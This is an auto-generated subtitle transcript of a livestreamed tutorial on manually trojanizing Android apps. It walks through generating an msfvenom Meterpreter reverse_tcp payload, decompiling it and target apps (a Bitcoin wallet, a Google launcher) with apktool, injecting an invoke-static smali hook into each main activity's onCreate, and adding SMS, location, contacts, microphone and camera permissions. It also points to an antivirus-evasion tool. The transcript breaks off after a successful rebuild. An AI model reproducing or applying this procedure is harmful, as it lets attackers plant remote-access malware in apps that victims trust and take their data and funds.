1
00:00:00,000 --> 00:00:23,440
Hey guys, thank you for joining the live stream. As you can see from the title, this video
2
00:00:23,440 --> 00:00:29,640
is going to be about embedding payloads in Android APKs. This is a video that has been
3
00:00:29,640 --> 00:00:36,400
requested for quite some time. So I'm going to be showing you that in this particular video. So
4
00:00:36,400 --> 00:00:42,640
again, the whole idea was to do it manually. So that's primarily what I'm going to be doing. So
5
00:00:42,640 --> 00:00:48,280
by default, I have already downloaded an APK here. I'm going to be using the Bitcoin Wallet
6
00:00:48,280 --> 00:00:54,960
to demonstrate this. So I'll be taking you through the overall process of doing it. So the
7
00:00:54,960 --> 00:01:00,360
first thing that we're going to be doing is generating the payload with msfvenom. So no
8
00:01:00,360 --> 00:01:09,640
obfuscation yet. So after we generate the payload, we're then going to decompile the payload with
9
00:01:09,640 --> 00:01:16,120
apktool. And then we'll also use our particular APK of choice and also decompile it, and I'll
10
00:01:16,120 --> 00:01:21,960
show you how to embed the payload or inject the payload into a particular application or APK file.
11
00:01:21,960 --> 00:01:28,560
All right. So let us get started here. So the first thing of course, we are going to need to do
12
00:01:28,560 --> 00:01:34,440
is we are going to need to generate our payload with msfvenom. Alright, so let's do that right
13
00:01:34,440 --> 00:01:41,920
now. So msfvenom -p, and that's our payload. And of course, with Meterpreter, there are various
14
00:01:41,920 --> 00:01:46,760
modules that you can use. So for example, you can use reverse_tcp, reverse_https, etc. So
15
00:01:46,760 --> 00:01:53,840
android/meterpreter/reverse_tcp. I'll be stopping during the video to answer your
16
00:01:53,840 --> 00:01:58,960
questions. So yeah, you can just post them right over there. And I'll be answering them. So
17
00:01:58,960 --> 00:02:07,920
android/meterpreter/reverse_tcp. And then of course, you can set your LHOST to 192.168.1.108. And your LPORT,
18
00:02:07,920 --> 00:02:14,600
I'll set that to just 1234. And again, you then move on to actually outputting
19
00:02:14,600 --> 00:02:21,480
the file. So we'll just call this payload.apk. And I'm on my desktop. But in any case,
20
00:02:21,480 --> 00:02:27,400
I'll just copy that file there. So I will generate the payload. And then we'll start
21
00:02:27,400 --> 00:02:31,960
decompiling the payload first. I'll show you how to do that with apktool. So that's the first thing
22
00:02:31,960 --> 00:02:38,880
we'll be doing. And then we can actually start decompiling the other Android
23
00:02:38,880 --> 00:02:46,160
application. So there are many applications that you can use. So yeah, I'm going to be answering
24
00:02:46,160 --> 00:02:51,240
the questions as the video essentially takes its time during the process. Apologies if my machine
25
00:02:51,240 --> 00:02:56,280
is a bit slow here, I'm using a virtual machine with very stringent resources. So there we are,
26
00:02:56,280 --> 00:03:01,440
the payload has been generated. And we can actually get started now. Alright, so I'm just
27
00:03:01,440 --> 00:03:08,880
going to copy the payload from this directory into our desktop here. And we'll move into our
28
00:03:08,880 --> 00:03:15,960
desktop now. And we have our APK right over here. So to actually decompile an application with
29
00:03:15,960 --> 00:03:23,680
apktool, we can type in apktool here. And then of course, we decompile, which is denoted by
30
00:03:23,680 --> 00:03:29,320
the d command, and we use the -f flag, and then we specify the application. So payload.apk,
31
00:03:29,320 --> 00:03:34,600
that is, if it is in the working directory; otherwise,
32
00:03:34,600 --> 00:03:40,520
you need to specify the directory of the application. So then we move on to the
33
00:03:40,520 --> 00:03:45,880
output, where we want to output the file. So I'm just going to say /root/Desktop, the decompiled
34
00:03:45,880 --> 00:03:50,840
information, and I'll just call it payload into the payload folder and hit Enter. And that is
35
00:03:50,840 --> 00:03:57,840
going to start decompiling the application. Alright, so we will then move on. And let me try
36
00:03:57,840 --> 00:04:05,000
and answer some questions here. So does Sysinternals have a decompiler? Sysinternals is
37
00:04:05,000 --> 00:04:13,080
more focused on Windows and Windows management. I'll be making a video on that as well. This
38
00:04:13,080 --> 00:04:19,280
payload only works in the local network, or you can set up port forwarding. That is if you have a static
39
00:04:19,280 --> 00:04:25,320
IP, so that it does work. Unless you have a dynamic IP; then, if it's going to keep on changing,
40
00:04:25,320 --> 00:04:30,040
then you might not have a persistent session. So it's always good to have a static IP for that.
41
00:04:30,040 --> 00:04:36,160
Alright, so the decompilation is completed. So I'm just going to list the files in here. And you
42
00:04:36,160 --> 00:04:40,640
can see that we have the payload folder right over here. Now the interesting thing that you can
43
00:04:40,640 --> 00:04:46,600
actually do with the payload. So if I switch into the payload directory here, we have the
44
00:04:46,600 --> 00:04:52,920
AndroidManifest.xml, we have the apktool.yml file here, which we are not working with,
45
00:04:52,920 --> 00:04:57,800
and the smali folder, which is the assembler, which can be considered an assembler
46
00:04:57,800 --> 00:05:03,440
for Android. So if we go into the smali folder, this is where we will have our com/metasploit
47
00:05:03,440 --> 00:05:09,320
and the stage directory. Alright, so if I change into the com, right over here, and we have the
48
00:05:09,320 --> 00:05:14,600
metasploit, and then you'll find the payload file within the metasploit folder, and within
49
00:05:14,600 --> 00:05:20,800
the stage. So if I just hit Enter, there we are. So we have the Payload, the Payload.smali
50
00:05:20,800 --> 00:05:26,800
file right over here. So general editing of the payload application is very, very simple.
51
00:05:26,800 --> 00:05:32,520
So if I was to just go back into my previous directories here, sorry about that. Let me just
52
00:05:32,520 --> 00:05:36,480
take you a step back. So we can actually take a look at the Android manifest. So the Android
53
00:05:36,480 --> 00:05:39,840
manifest is where you can essentially edit the permissions for your payload. But of course,
54
00:05:39,840 --> 00:05:44,480
we'll be looking at that in a second. So if I just browse onto my desktop here, let me just
55
00:05:44,480 --> 00:05:50,320
open that up. Apologies, this is taking a while. Desktop. And we go into our payload here. And
56
00:05:50,480 --> 00:05:58,800
AndroidManifest.xml. And yeah, there we are. So we have our permissions in here. And what we'll
57
00:05:58,800 --> 00:06:02,960
be looking for, and we'll be decompiling our other application in which we'll be embedding
58
00:06:02,960 --> 00:06:07,520
the particular payload is we're looking for the main activity. Alright, now this is going to be
59
00:06:07,520 --> 00:06:12,560
very important. But of course, this application has no other activity. So the default one will
60
00:06:12,560 --> 00:06:17,760
be the onCreate for the main activity, if you've ever done Android programming. Alright, so we're
61
00:06:17,760 --> 00:06:22,960
looking particularly for these two lines of code, we're looking for android.intent.action.MAIN,
62
00:06:22,960 --> 00:06:27,120
that is the most important one right over here. And from that, you'll get the application source.
63
00:06:27,120 --> 00:06:32,800
So right over here is where you can edit your permissions. But these are going to be
64
00:06:32,800 --> 00:06:39,360
important, especially when embedding the Metasploit payload into your other Android
65
00:06:39,360 --> 00:06:44,000
application. So let's actually get started on that right now. So what I'm going to
66
00:06:44,000 --> 00:06:50,640
do is I'm just going to take a step back here. And I'll just copy the application, which is the
67
00:06:50,640 --> 00:06:57,440
Bitcoin Wallet, I believe. Sorry, that is in my Downloads folder, like so.
68
00:06:57,440 --> 00:07:03,360
And that is in com, I believe. What is the application name? Not sure; it's telling me
69
00:07:05,040 --> 00:07:09,120
what my application name is. Did I actually download the application? Let me just check.
70
00:07:10,080 --> 00:07:15,520
I should have got it right over here. Yeah, there we are. It is the Schildbach wallet. So let me
71
00:07:15,520 --> 00:07:20,240
just copy it here directly. So we can actually speed this up. Alright, so we can get started
72
00:07:20,240 --> 00:07:27,040
with the decompilation. Alright, so in here, we can start decompiling this with apktool again,
73
00:07:27,840 --> 00:07:34,640
apktool d -f, and then we specify the application here. Sorry, this is on my Android.
74
00:07:34,640 --> 00:07:40,640
Yeah, sorry about that. The application here, we output this, I'll just call this desktop,
75
00:07:40,640 --> 00:07:45,200
and we will call this the original APK and hit Enter.
76
00:07:52,720 --> 00:07:55,200
Alright, let me take a look at the questions here that we're getting.
77
00:07:55,840 --> 00:08:04,080
Um, Ryan, no, that's not a question for me. How to get a static IP? That'll depend on your
78
00:08:04,080 --> 00:08:13,120
ISP and how many and what IPs they've given you. Max Fire says noob. Yeah, if you say so.
79
00:08:16,240 --> 00:08:24,640
Good, Hassan. How's everyone doing? Alright, the decompilation is complete. We can actually move on.
80
00:08:25,760 --> 00:08:30,560
Alright, so now we need to go into the original folder here. And this is where we'll be doing
81
00:08:31,120 --> 00:08:36,880
most of the editing. So again, the first thing you want to do is you want to actually create
82
00:08:36,880 --> 00:08:42,160
the metasploit/stage folder within the smali folder. So I'll show you how to do that under
83
00:08:42,160 --> 00:08:47,680
com. So smali, we enter here. So we want to go into the com directory, we hit Enter.
84
00:08:48,320 --> 00:08:53,600
And in here, we need to create the metasploit folder. So we create the metasploit/stage folder. So
85
00:08:54,560 --> 00:09:03,600
mkdir metasploit, cd metasploit and mkdir. We'll just call this stage, and
86
00:09:03,600 --> 00:09:08,160
we'll change our directory into stage. So now what we need to do is we need to copy that initial
87
00:09:08,160 --> 00:09:15,200
payload from the metasploit/stage folder into the smali/com/metasploit/stage folder as well.
88
00:09:15,200 --> 00:09:18,960
So that's the first thing we need to transfer the payload. And then I'll show you how to
89
00:09:18,960 --> 00:09:22,880
actually add that line of code, after we do that, in the main activity.
90
00:09:23,440 --> 00:09:29,520
So what I'll be doing for this video, because I have a few minutes left that I can actually
91
00:09:29,520 --> 00:09:34,800
live stream, I'll be actually recording follow up videos for this showing you how to sign the APKs
92
00:09:35,360 --> 00:09:40,240
and how to obfuscate them. So let's do that first. So what I'm going to do is I'm just going to say
93
00:09:40,240 --> 00:09:46,800
cp /root/Desktop, and we are looking for the payload. So payload, what are the directories
94
00:09:46,800 --> 00:09:53,040
we have in here? So payload, there we are, we have the smali folder, and we want to go into
95
00:09:53,040 --> 00:10:00,160
com/metasploit and we want the payload; we actually get the stage and the Payload.smali
96
00:10:00,160 --> 00:10:07,520
file right over here. And we will copy that again from that directory, /root/Desktop. And we are
97
00:10:07,520 --> 00:10:19,040
moving into the original. So original, smali, com, metasploit, stage, and Enter,
98
00:10:19,040 --> 00:10:24,400
and we should have the file in there. Alright, so that is the payload right over here. Before
99
00:10:24,400 --> 00:10:32,240
we actually move on. exploit, will this video be accessible after the stream? Yes, it will be.
100
00:10:32,960 --> 00:10:35,360
That's primarily why I was making this video, because it was just
101
00:10:38,480 --> 00:10:45,280
Narayan Mahato asks me what I'm doing in a very obscure way. But anyway,
102
00:10:45,920 --> 00:10:54,800
I'll just forget that ever happened. So now that we have the Payload.smali file
103
00:10:54,800 --> 00:11:00,080
within the metasploit/stage folder created under the original APK file, we can actually get started
104
00:11:00,080 --> 00:11:05,680
with editing the Android manifest file. However, the first thing, as I mentioned, we
105
00:11:05,680 --> 00:11:11,600
need to do is we need to look for the main activity that is going to be launched when the
106
00:11:11,600 --> 00:11:16,560
application starts off first. So what happens is when we start the application for the
107
00:11:16,560 --> 00:11:21,600
first time, as you do with Android, for any of you who have done Android programming, the main activity
108
00:11:21,600 --> 00:11:25,440
is what is started. So we are primarily looking for that. So we're going to go into original
109
00:11:25,440 --> 00:11:30,720
Android manifest open with text editor. And now this is where the exciting stuff is. So you can
110
00:11:30,720 --> 00:11:36,800
go ahead and take a look at the minimum SDK requirements. And again, what we're looking
111
00:11:36,800 --> 00:11:44,240
for is android.intent.action.MAIN, and the activity will be just listed at the top
112
00:11:44,240 --> 00:11:49,760
right over here. So these two go under the activity alias, which is listed as well over
113
00:11:49,760 --> 00:11:56,240
here. So we're looking for de.schildbach.wallet.ui.WalletActivity. Alright,
114
00:11:56,240 --> 00:12:02,240
so we're going to look for that directory right now. So that is de, and that is under smali again,
115
00:12:02,240 --> 00:12:08,880
so smali, de, schildbach, wallet, and we're looking for the ui. So we're going to look for
116
00:12:08,880 --> 00:12:14,160
the ui folder here. And we're looking for the WalletActivity. Alright, so we can
117
00:12:14,160 --> 00:12:20,240
WalletActivity, there we are, and we can open that up with a text editor. And now we're looking
118
00:12:20,240 --> 00:12:25,920
for the onCreate function. Alright, so the onCreate again is very important, because
119
00:12:25,920 --> 00:12:30,320
we are looking for the android.os.Bundle. So we can add the line right over here. Now,
120
00:12:31,120 --> 00:12:36,960
many of you will be wondering; we'll actually add it below the invoke-super.
121
00:12:36,960 --> 00:12:41,680
So this is where we're going to be invoking a static one. And that again is going to be launching the
122
00:12:41,680 --> 00:12:48,560
payload during the onCreate function, which again is going to utilize the Landroid right
123
00:12:48,560 --> 00:12:55,200
over here. Alright, so now we can actually get started here. So the first thing, as I mentioned,
124
00:12:55,200 --> 00:13:01,440
we're going to get started with is we need to start copying those particular files. So before
125
00:13:01,440 --> 00:13:06,640
before we actually move ahead with this video, let me just explain what's going on.
126
00:13:06,640 --> 00:13:11,760
So we are going to be going into the wallet activity, which is going to be launched during
127
00:13:11,760 --> 00:13:15,440
the time when the application is launched. And so during that, we're going to use
128
00:13:15,440 --> 00:13:21,200
the onCreate as well here, to essentially load up the Payload.smali file that we actually
129
00:13:21,200 --> 00:13:26,160
copied. Alright, so let us actually get started. So what I'm going to do is let me just go through
130
00:13:26,160 --> 00:13:29,920
your questions, or I'll actually go through them after this. So the first thing we're going to do
131
00:13:29,920 --> 00:13:36,000
is we're going to go to the line, we will go right over here, we need to have it below the onCreate
132
00:13:36,000 --> 00:13:41,520
line that utilizes the os.Bundle here. So we're going to say, sorry, there we are,
133
00:13:41,520 --> 00:13:46,880
there it is. So I'm just going to indent appropriately. So invoke-static. And again,
134
00:13:46,880 --> 00:13:52,560
we're going to use p0. So p0 here in curly braces, so {p0}. And I'll explain what
135
00:13:52,560 --> 00:13:56,880
all of this is, I'm planning on making a separate video for this, because again, I'm going to be
136
00:13:56,880 --> 00:14:02,080
start confusing people if I go on with that. So invoke-static, and then we're going to use the
137
00:14:02,080 --> 00:14:08,160
Lcom, which is the com folder. So Lcom, and then the metasploit folder, metasploit,
138
00:14:08,160 --> 00:14:13,680
and then you have your stage. And you have your Payload here, which again is Payload;
139
00:14:13,680 --> 00:14:18,800
you don't need to specify that it is a smali file, so you can leave off the extension. So then that
140
00:14:18,800 --> 00:14:24,800
is going to bring us up into the onCreate function. So onCreate, and then now we're
141
00:14:24,800 --> 00:14:30,160
utilizing Landroid again. So Landroid/content/Context. So it will launch every
142
00:14:30,160 --> 00:14:35,680
time the WalletActivity is started up, which is the main activity when the application
143
00:14:35,680 --> 00:14:39,680
starts up. So yeah, there we are. So that will essentially launch the payload. And if you have
144
00:14:39,680 --> 00:14:44,640
created the payload appropriately, you set up your exploit/multi/handler, and you're pretty
145
00:14:44,640 --> 00:14:49,680
good right over there to get started. So onCreate, and then we're using Landroid,
146
00:14:51,200 --> 00:14:57,360
or L-Android, whatever you want to call it, for those of you; content, and then Context,
147
00:14:57,360 --> 00:15:03,360
and then we close that up, and we use the capital V. And we can then save this file.
148
00:15:04,400 --> 00:15:09,760
Alright, now that we're done with that, you now need to start copying the permissions you require.
149
00:15:09,760 --> 00:15:15,760
And this is unique for every application, because as you can see, the Bitcoin Wallet application
150
00:15:15,760 --> 00:15:20,720
allows for these permissions, okay, it allows the camera to be used, it allows a wake lock,
151
00:15:20,720 --> 00:15:26,560
which is very, very good, allows Bluetooth, NFC, the network state; it allows you to access the network
152
00:15:26,560 --> 00:15:32,640
state. So it has many of the important ones that we have here. So what we're going to do is we are
153
00:15:32,640 --> 00:15:37,760
going to copy the important ones. And those are going to do with the coarse
154
00:15:37,760 --> 00:15:45,280
location, the fine location, the phone state, send SMS, receive SMS, record audio, call phone, read
155
00:15:45,280 --> 00:15:52,320
contacts, write contacts, record audio, camera, write external storage; we don't need the wallpaper,
156
00:15:52,400 --> 00:15:58,560
we'll just get rid of it from there. So we'll copy the Android permissions here.
157
00:15:59,280 --> 00:16:07,360
And we will paste it in and delete the duplicates from here. So again, I will delete the
158
00:16:07,360 --> 00:16:12,480
duplicates. So let me just look for one of them that I know we did have here. That was the wake
159
00:16:12,480 --> 00:16:19,280
lock, which I'm sure was up right over here. Write call log, set wallpaper, we don't need that one.
160
00:16:19,280 --> 00:16:24,960
So let's get rid of that first. Receive boot completed, camera, settings, write settings.
161
00:16:24,960 --> 00:16:34,400
Yeah, that's fine. I believe I saw wake lock here. But I think, yeah, that should be it. So
162
00:16:34,400 --> 00:16:38,400
yeah, we don't have any duplicates. So that's excellent. So we're going to save that manifest
163
00:16:38,400 --> 00:16:43,440
file here. And we are ready to go, we're ready to compile the application. So what we've done
164
00:16:43,440 --> 00:16:48,640
essentially till now, let me answer some questions before we actually recompile. So what we've done
165
00:16:48,640 --> 00:16:56,800
till now is we have essentially embedded the msfvenom payload. Now one thing to take
166
00:16:56,800 --> 00:17:03,360
into consideration is we have not particularly obfuscated the Android application, which means
167
00:17:03,360 --> 00:17:09,600
there is going to be some level of detection. I'll probably be making another video
168
00:17:09,600 --> 00:17:14,960
on this, where I'll actually show you how to perform the obfuscation on a particular Android
169
00:17:14,960 --> 00:17:19,200
application. And if you want to perform obfuscation, I believe I have one of these
170
00:17:19,200 --> 00:17:24,320
links here that we used to use before, and that is apkwash. apkwash allows you to essentially
171
00:17:24,320 --> 00:17:30,320
obfuscate or generate, as you can see right over here, Android APK antivirus evasion for msfvenom
172
00:17:30,320 --> 00:17:35,680
generated payloads. So this allows you to obfuscate various msfvenom payloads.
173
00:17:36,800 --> 00:17:43,440
And of course, I know that embedding or injecting a payload with msfvenom already exists. And yeah,
174
00:17:43,440 --> 00:17:47,120
someone has just pointed out that the camera is a duplicate permission. So let me just check that
175
00:17:47,120 --> 00:17:53,520
out right now. Looks like we also have read contacts. Now there's read and write contacts.
176
00:17:54,400 --> 00:18:00,800
Let me check this right over here. I can see camera right here. Let's see if we can find there
177
00:18:00,800 --> 00:18:05,600
we are. Thank you very much for pointing that out. I really
178
00:18:05,600 --> 00:18:10,720
appreciate that. I was probably looking for wake lock as well. But it really shouldn't cause an
179
00:18:10,720 --> 00:18:15,840
issue. So let me just save this right now and we can get started with the recompilation.
180
00:18:16,560 --> 00:18:23,680
Alright, so we want to recompile the original APK here. And we can do that right now. So what
181
00:18:23,680 --> 00:18:29,440
we can do is we can essentially recompile from any directory. So apktool, and I'll say build,
182
00:18:29,440 --> 00:18:34,640
and then we can specify the directory again. So /root/Desktop, and then we specify the original
183
00:18:34,640 --> 00:18:38,880
folder here. Now this is where things get very, very important. When you talk about using
184
00:18:39,520 --> 00:18:46,560
applications or scripts like TheFatRat, for example; TheFatRat is a tool that generates,
185
00:18:47,200 --> 00:18:55,200
most likely to great success, a signed payload, apart from embedding applications,
186
00:18:55,200 --> 00:18:59,600
which we know is very, very difficult to do automatically, because you usually get errors.
187
00:18:59,600 --> 00:19:04,720
So if we do get an error here, then I'll probably have to take a deeper look
188
00:19:04,720 --> 00:19:10,160
at the application. So I'm just going to try and recompile it once; if it doesn't
189
00:19:10,160 --> 00:19:13,840
compile, then I'll probably have to find another application. But I just wanted to make a quick
190
00:19:13,840 --> 00:19:19,280
live stream for this video. So let me just answer a few questions before we carry on.
191
00:19:20,880 --> 00:19:26,000
Use Termux on a rooted Android device. Yes, more Android videos are coming. That's primarily why
192
00:19:26,000 --> 00:19:34,080
I've started with this right now. Termux hacking. Excellent. Yes, it is very, very good. Very,
193
00:19:34,160 --> 00:19:41,840
good application. Yeah, we have a good question here telling us: I've tried TheFatRat, it failed
194
00:19:41,840 --> 00:19:47,280
with signing. Yes, that's probably because it uses zipalign. And I'm not sure if we'll get an error
195
00:19:47,280 --> 00:19:53,120
right now, we probably will. But let's see what error we get. I'll probably try and understand
196
00:19:53,120 --> 00:19:58,160
what's going on. Now this is where real skill comes into play. Because if you're going to manually
197
00:19:58,160 --> 00:20:04,000
embed these payloads into applications, it also gives
198
00:20:04,000 --> 00:20:08,800
you an opportunity to test which applications allow you to embed these various payloads,
199
00:20:08,800 --> 00:20:13,200
because some applications will not recompile at all. So it's very, very important to take
200
00:20:13,200 --> 00:20:18,800
that into consideration. So I've essentially started the recompilation process. And this looks
201
00:20:18,800 --> 00:20:23,440
like it's going to work. And again, it tells us that it failed right over here. So let's take a
202
00:20:23,440 --> 00:20:28,080
look at what actually caused the error. And immediately we get the AAPT error, which I'm
203
00:20:28,080 --> 00:20:41,760
not going to explain right now. Alright, so if we take a look at this
204
00:20:41,760 --> 00:20:48,000
right over here, you can see that by default... yes, I'll be uploading the video after. You can see that
205
00:20:48,000 --> 00:20:52,560
we've got an error and it's giving us an error in the Android manifest file first. But the main
206
00:20:52,560 --> 00:20:58,720
issue is with the AAPT, which means we probably need the Android SDK installed, because of the
207
00:20:58,720 --> 00:21:05,040
various requirements. So what we can do is we can just try and download another application here,
208
00:21:05,040 --> 00:21:09,680
probably a simpler application, let me just find one that's, again, very, very simple.
209
00:21:10,720 --> 00:21:16,800
I'll just let me see if I can find another application. What if the main activity is
210
00:21:16,800 --> 00:21:21,280
hidden? There must be a main activity. That's a very, very good question. In fact, I'll just
211
00:21:21,280 --> 00:21:27,920
answer a question. I'll make a separate video on this. What is the main activity? Yeah,
212
00:21:27,920 --> 00:21:32,720
that's a very good question. So every application will be designed differently. And usually what
213
00:21:32,720 --> 00:21:38,320
again, what you're looking for is android.intent.action.MAIN, if you can find those two lines,
214
00:21:38,320 --> 00:21:43,200
where it actually specifies the intent MAIN, and it also specifies the icon,
215
00:21:44,480 --> 00:21:49,760
or the drawable icon, if it's right over there, then you essentially know that the
216
00:21:51,360 --> 00:21:56,240
top group right over there that contains the activity is going to be the main activity.
217
00:21:56,240 --> 00:22:03,760
So your job is to look for that within the smali
218
00:22:03,760 --> 00:22:09,760
compiler. Alright, so also TheFatRat does not provide obfuscation. Yes, that's a very good
219
00:22:09,760 --> 00:22:15,760
question. TheFatRat does not provide obfuscation, it simply signs the application. So if I was to
220
00:22:15,760 --> 00:22:19,120
compile this application, I remember the Google Now launcher did work
221
00:22:20,080 --> 00:22:24,320
with the recompilation. So I'll do that for you guys once again,
222
00:22:24,320 --> 00:22:31,120
so I'll download this here. And I'll do it again with you guys. This did work;
223
00:22:31,120 --> 00:22:36,080
what you will find is, after I have recompiled the application, I need to sign it. And that's
224
00:22:36,080 --> 00:22:40,320
where probably I can use TheFatRat, or I'll actually be making a separate video showing
225
00:22:40,320 --> 00:22:45,760
you how to do this. So I have downloaded the application, let me just wait for that to complete.
226
00:22:45,760 --> 00:22:51,760
Let me see if that is downloading. Probably... Yeah, anyway, I'll just wait for that to complete.
227
00:22:51,760 --> 00:22:58,800
So in the meantime, what I'll do is, I will just go back to my desktop here, we'll keep the payload,
228
00:22:58,800 --> 00:23:05,520
I'll get rid of the Bitcoin Wallet application here. And I will get rid of the original folder,
229
00:23:06,640 --> 00:23:11,600
which contained our decompiled application. So we have the payload.apk here,
230
00:23:12,480 --> 00:23:17,600
which we decompiled. And if we just list the files in here, sorry about that. If we list the files,
231
00:23:17,600 --> 00:23:22,080
we have the payload folder, which contains the payload itself, which is the most important bit
232
00:23:22,080 --> 00:23:29,040
once we start embedding. So again, hopefully this just finishes downloading;
233
00:23:29,040 --> 00:23:33,840
for some reason, it did not start downloading apologies for that. Let me just try and save
234
00:23:33,840 --> 00:23:39,600
my internet does not seem to be working right now. Or has it downloaded? My browser is unresponsive,
235
00:23:40,400 --> 00:23:50,480
sadly. So let me just list my Downloads folder here.
236
00:23:51,360 --> 00:23:54,960
Looks like the application has completed downloading. So
237
00:23:56,400 --> 00:24:00,240
if I can just check the size of this, looks like one of them is eight megabytes. Yeah,
238
00:24:00,240 --> 00:24:05,280
so that looks like it's completed. So I'll just copy that com. I'll just copy the
239
00:24:05,280 --> 00:24:16,160
Downloads. Let me just get rid of that there. And we'll just copy the
240
00:24:16,160 --> 00:24:24,000
application to the desktop and we can decompile that immediately. Alright, so copy downloads,
241
00:24:24,000 --> 00:24:31,760
and we'll copy the com Android launcher to Desktop and hit Enter. And for some reason
242
00:24:31,760 --> 00:24:43,440
looks like the downloads did not complete. Sorry,
243
00:24:44,800 --> 00:24:49,360
/root/Downloads, I keep getting confused with that. Let me just check the Downloads. It looks
244
00:24:49,360 --> 00:24:54,720
like they haven't completed yet. But for some reason, my browser isn't working. Let's
245
00:24:54,720 --> 00:25:00,000
see if it does prompt us to actually download that. In any case, I'll just
246
00:25:00,000 --> 00:25:05,200
delete the duplicate one right over here. And hopefully we can actually copy them now.
247
00:25:06,480 --> 00:25:15,440
So I'll just copy this. All right, I'd love to speed through this process now,
248
00:25:16,800 --> 00:25:21,920
So that I can actually show you that the compilation does work. So what we'll do now is
249
00:25:21,920 --> 00:25:28,320
we will use apktool, apktool d, and we'll do com.google right over here.
250
00:25:29,920 --> 00:25:38,880
And we'll call this original, hit Enter. For some reason... oh, sorry, I forgot the output file,
251
00:25:38,880 --> 00:25:44,560
that is the output parameter right over here. And we're just gonna wait for this to decompile. So
252
00:25:44,560 --> 00:25:50,560
let me just answer some of the questions. Yes, I have duplicates. Just saw that downloaded the
253
00:25:50,560 --> 00:25:56,160
file twice. So yeah, we've decompiled the application. Let me just try and answer
254
00:25:58,000 --> 00:26:03,360
one more question. Let me just see if we have any other questions before I continue.
255
00:26:05,360 --> 00:26:09,360
What is this for? This video is focused on how to manually embed payloads,
256
00:26:09,360 --> 00:26:20,400
MSF Venom payloads in Android APKs. At least I got to see you brother salam. Hello, Naheed
257
00:26:20,480 --> 00:26:30,480
thank you for joining the stream. Yeah, that looks to be like the only questions there. All right,
258
00:26:30,480 --> 00:26:35,440
so we can get started now. So I'm just going to change the directory into the original folder here.
259
00:26:36,160 --> 00:26:40,720
And again, we're going to go into the smali folder again, smali, list the files in there, CD
260
00:26:40,720 --> 00:26:49,760
com. And we will create our Metasploit directory again. Metasploit CD Metasploit again here.
261
00:26:51,360 --> 00:26:56,640
Stage. And we can just leave the stage in there. So what we're going to do is we're going
262
00:26:56,640 --> 00:27:01,760
to say CD root desktop or sorry, we're going to copy the payload file here. So copy root desktop
263
00:27:01,760 --> 00:27:08,560
payload, smali, and we're looking for the Metasploit, is that the com Metasploit, sorry,
264
00:27:08,560 --> 00:27:16,720
and the stage and the Payload.smali file into the root desktop original. And we're looking
265
00:27:16,720 --> 00:27:24,320
for the smali com Metasploit stage directory, hit enter, if we list the files in there, sorry stage,
266
00:27:24,880 --> 00:27:29,040
list the files in here we have the payload file. Alright, so now we can move on into the Android
267
00:27:29,040 --> 00:27:33,360
manifest file once more to actually explore what's going on. So we'll go to the original
268
00:27:33,360 --> 00:27:38,000
Android manifest file. Let me just close the previous ones here. Because I don't want to
269
00:27:38,000 --> 00:27:42,640
get confused with the other ones that we had for the other application. And we'll get I will get
270
00:27:42,640 --> 00:27:48,480
rid of this as well because we're not working with that activity file. So AndroidManifest.xml.
271
00:27:50,080 --> 00:27:54,800
And now you can see with a simple application again, all we're looking for is we're looking
272
00:27:54,800 --> 00:27:59,600
for the action right over here. So the android.intent.action.MAIN. And just above this,
273
00:27:59,600 --> 00:28:04,480
you will get the Android name right over here. So you have com.google.android.launcher.StubApp.
274
00:28:04,480 --> 00:28:09,600
Alright, so that is the activity that we are primarily looking for. Okay, so we need to look
275
00:28:09,600 --> 00:28:13,920
for that activity and the directories listed right over here. So you have com Google. So if
276
00:28:13,920 --> 00:28:20,240
you go to smali, com, google, android, launcher, and we're looking for the StubApp. Alright,
277
00:28:20,240 --> 00:28:24,960
so again, you can simply just find it right over here, StubApp. And we can open that up with a
278
00:28:24,960 --> 00:28:33,360
text editor. And we are looking for onCreate, sorry, onCreate. And there we are, we have the
279
00:28:33,360 --> 00:28:37,760
onCreate right over here. So again, we're going to create our invoke-static. So let me just do
280
00:28:37,760 --> 00:28:44,800
that really, really quickly. invoke-static. And we're looking for P zero curly braces always when
281
00:28:44,800 --> 00:28:50,080
specifying arguments with Android, sorry. And then we're looking for the land right.
282
00:28:51,920 --> 00:28:56,480
And of course, with the land right now you can, with this I need to also explain something
283
00:28:57,760 --> 00:29:03,520
important. If you do want to, if you have created a payload that does use an activity,
284
00:29:03,520 --> 00:29:07,680
this is a great place of doing it. Alright, I just wanted to make sure that you guys understood
285
00:29:07,680 --> 00:29:16,000
that before we continue. Alright, so land right metasploit stage. So again, metasploit
286
00:29:16,000 --> 00:29:22,320
stage, let me just get that right. Yep, stage metasploit stage payload. And we're looking for
287
00:29:22,320 --> 00:29:30,880
this particular onCreate method. So onCreate, land right. And we are using the content and the
288
00:29:30,880 --> 00:29:38,000
context here. So content, based on the content, and the context, context is always in capital.
289
00:29:38,960 --> 00:29:44,320
And we'll close that up capital V, and we'll save that. Alright, now we can deal with the
290
00:29:44,320 --> 00:29:48,560
original AndroidManifest, and I'm going to open up the AndroidManifest for the payload
291
00:29:48,560 --> 00:29:56,320
application. Because this particular Google launcher does not have any, any useful,
292
00:29:56,320 --> 00:30:03,600
any useful permissions. So we only have read settings and write settings. So what I'll do is,
293
00:30:04,960 --> 00:30:09,520
we can essentially just copy everything. So we do need internet, we need the Wi-Fi state,
294
00:30:09,520 --> 00:30:14,720
we'll just copy everything here, we'll get rid of the write settings option as well.
295
00:30:15,840 --> 00:30:20,880
And we can also do that right here, we don't want to muck with the original application
296
00:30:20,880 --> 00:30:25,280
permission, otherwise that can affect its functionality. So again, we'll get rid of
297
00:30:25,280 --> 00:30:33,200
write settings here. I will get rid of write settings. And now we can save this file. And
298
00:30:33,200 --> 00:30:37,440
hopefully we should be able to compile this application now without any errors. As far as
299
00:30:37,440 --> 00:30:41,120
I remember, this was the only one working. So again, before we do that, let me just try and
300
00:30:41,120 --> 00:30:54,000
answer some questions. Harsh Dinani. I love your videos. I'm a commerce student said I practice
301
00:30:54,000 --> 00:30:58,720
that's excellent. That's primarily why these videos are there. So go ahead just enjoy practicing.
302
00:30:58,720 --> 00:31:05,280
That's what it's all about. So again, we'll use the APK tool. And we will build so build a root
303
00:31:05,840 --> 00:31:10,160
desktop and we'll use the original folder in it and to hopefully now the application.
304
00:31:11,840 --> 00:31:16,000
There we are, the application was successfully compiled, we did get the AAPT error, but that
305
00:31:16,000 --> 00:31:21,600
was very, very, very small error. And if we just take a look at the sorry, if we just take a look
306
00:31:21,600 --> 00:31:28,640
at the we just list the files here, sorry, let me just list the files. You can see that under the
307
00:31:28,640 --> 00:31:34,800
dist folder. Under the dist folder, we have the compiled application here. And now that is not
308
00:31:34,800 --> 00:31:40,320
